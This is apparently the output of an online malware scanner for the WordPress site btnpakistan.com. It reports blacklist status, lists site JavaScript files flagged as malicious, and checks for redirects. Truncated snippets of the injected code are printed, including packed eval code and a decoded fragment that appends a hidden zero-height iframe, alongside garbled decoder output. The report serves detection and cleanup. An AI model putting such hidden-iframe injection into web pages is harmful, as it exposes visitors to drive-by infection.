Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=btnpakistan.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://btnpakistan.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.btnpakistan.com/ | 200 OK Content-Length: 27810 Content-Type: text/html | clean |
http://www.btnpakistan.com/wp-content/themes/Digital_Statement/Digital Statement/js/tabber.js | 200 OK Content-Length: 22957 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function tabberObj(argsObj) { var arg; this.div = null; this.classMain = "tabber"; this.classMainLive = "tabberlive"; this.classTab = "tabbertab"; this.classTabDefault = "tabbertabdefault"; this.classNav = "tabbernav"; this.classTabHide = "tabbertabhide"; this.classNavActive = "tabberactive"; this.titleElements = ['h2','h3','h4','h5','h6']; this.titleElemen if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.btnpakistan.com/wp-content/themes/Digital_Statement/Digital Statement/js/mootools.svn.js | 200 OK Content-Length: 191088 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MooTools = { version: '1.11' }; function $defined(obj){ return (obj != undefined); }; function $type(obj){ if (!$defined(obj)) return false; if (obj.htmlElement) return 'element'; var type = typeof obj; if (type == 'object' && obj.nodeName){ switch(obj.nodeType){ case 1: return 'element'; case 3: return (/\S/).test(obj.nodeValue) ? 'textnode' : 'whitespace'; } } if (type == 'object' || type == 'functio if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 38552 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1c.4I,3n$=1c.$;J D=1c.4I=1c.$=H(a,b){I 2r D.18.5i(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,61=/^.[^:#\\[\\.]*$/,12;D.18=D.3V={5i:H(d,b){d=d|| if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-content/themes/Digital_Statement/Digital Statement/js/fancybox/jquery.fancybox-1.0.0.js | 200 OK Content-Length: 19530 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { var opts = {}, imgPreloader = new Image, imgTypes = ['png', 'jpg', 'jpeg', 'gif'], loadingTimer, loadingFrame = 1; $.fn.fancybox = function(settings) { opts.settings = $.extend({}, $.fn.fancybox.defaults, settings); $.fn.fancybox.init(); return this.each(function() { var $this = $(this); var o = $.metadata ? $.extend({}, opts.settings, $this.metadata()) : opts.settings; $this.unbind('click').click(function() { if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-content/themes/Digital_Statement/Digital Statement/js/smoothgallery/scripts/mootools.v1.11.js | 200 OK Content-Length: 42281 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m 9F={af:\'1.11\'};h $5k(L){k(L!=7D)};h $t(L){o(!$5k(L))k V;o(L.3T)k\'B\';m t=57 L;o(t==\'2w\'&&L.a7){2k(L.6m){17 1:k\'B\';17 3:k(/\\S/).2U(L.8q)?\'ak\':\'a if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-content/themes/Digital_Statement/Digital Statement/js/smoothgallery/scripts/jd.gallery.js | 200 OK Content-Length: 32190 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var gallery = { initialize: function(element, options) { this.setOptions({ showArrows: true, showCarousel: true, showInfopane: true, embedLinks: true, fadeDuration: 500, timed: false, delay: 13000, preloader: true, preloaderImage: true, preloaderErrorImage: true, manualData: [], populateFrom: false, populateData: true, destroyAfterPopulate: true, elementSelector: "div.image if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-includes/js/jquery/jquery.js?ver=1.2.6 | 200 OK Content-Length: 38552 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1c.4I,3n$=1c.$;J D=1c.4I=1c.$=H(a,b){I 2r D.18.5i(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,61=/^.[^:#\\[\\.]*$/,12;D.18=D.3V={5i:H(d,b){d=d|| if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-includes/js/jquery/jquery.form.js?ver=2.02 | 200 OK Content-Length: 38906 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.ajaxSubmit = function(options) { if (typeof options == 'function') options = { success: options }; options = $.extend({ url: this.attr('action') || window.location.toString(), type: this.attr('method') || 'GET' }, options || {}); var veto = {}; $.event.trigger('form.pre.serialize', [this, options, veto]); if (veto.veto) return this; var a = this.formToArray(options.semanti if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-content/plugins/contact-form-7/contact-form-7.js | 200 OK Content-Length: 11084 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { try { jQuery('div.wpcf7 > form').ajaxForm({ beforeSubmit: wpcf7BeforeSubmit, dataType: 'json', success: wpcf7ProcessJson }); } catch (e) { } try { jQuery('div.wpcf7 > form').each(function(i, n) { wpcf7ToggleSubmit(jQuery(n)); }); } catch (e) { } }); function wpcf7ExclusiveCheckbox(elem) {< if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/wp-content/plugins/timesurlat-sociable-plugin/description_selection.js | 200 OK Content-Length: 8023 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function sociable_get_selection() { if (window.getSelection) return "" + window.getSelection(); else if (document.getSelection) return "" + document.getSelection(); else if (document.selection) return "" + document.selection.createRange().text; } function sociable_description_link(link, attribute) { if (typeof(link.original_link) == "undefined") link.original_link = link.href; link.href = link.origina if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.btnpakistan.com/wp-content/themes/Digital_Statement/Digital Statement/js/date.js | 200 OK Content-Length: 7930 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var mydate=new Date() var year=mydate.getYear() if (year < 1000) year+=1900 var day=mydate.getDay() var month=mydate.getMonth() var daym=mydate.getDate() if (daym<10) daym="0"+daym var dayarray=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday") var montharray=new Array("January","February","March","April","May","June","July","August","September","October","November","December") document.write(""+dayarray[day]+", "+m if(f)e(s);} Antivirus reports:
| ||
http://www.btnpakistan.com/feed/ | 200 OK Content-Length: 76810 Content-Type: text/xml | clean |
http://www.btnpakistan.com/test404page.js | 404 Not Found Content-Length: 16632 Content-Type: text/html | clean |
http://www.btnpakistan.com/about-us/ | 200 OK Content-Length: 22204 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: btnpakistan.com
Result:
GET / HTTP/1.1
Host: btnpakistan.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: btnpakistan.com
Referer: http://www.google.com/search?q=btnpakistan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: btnpakistan.com
Referer: http://www.google.com/search?q=btnpakistan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.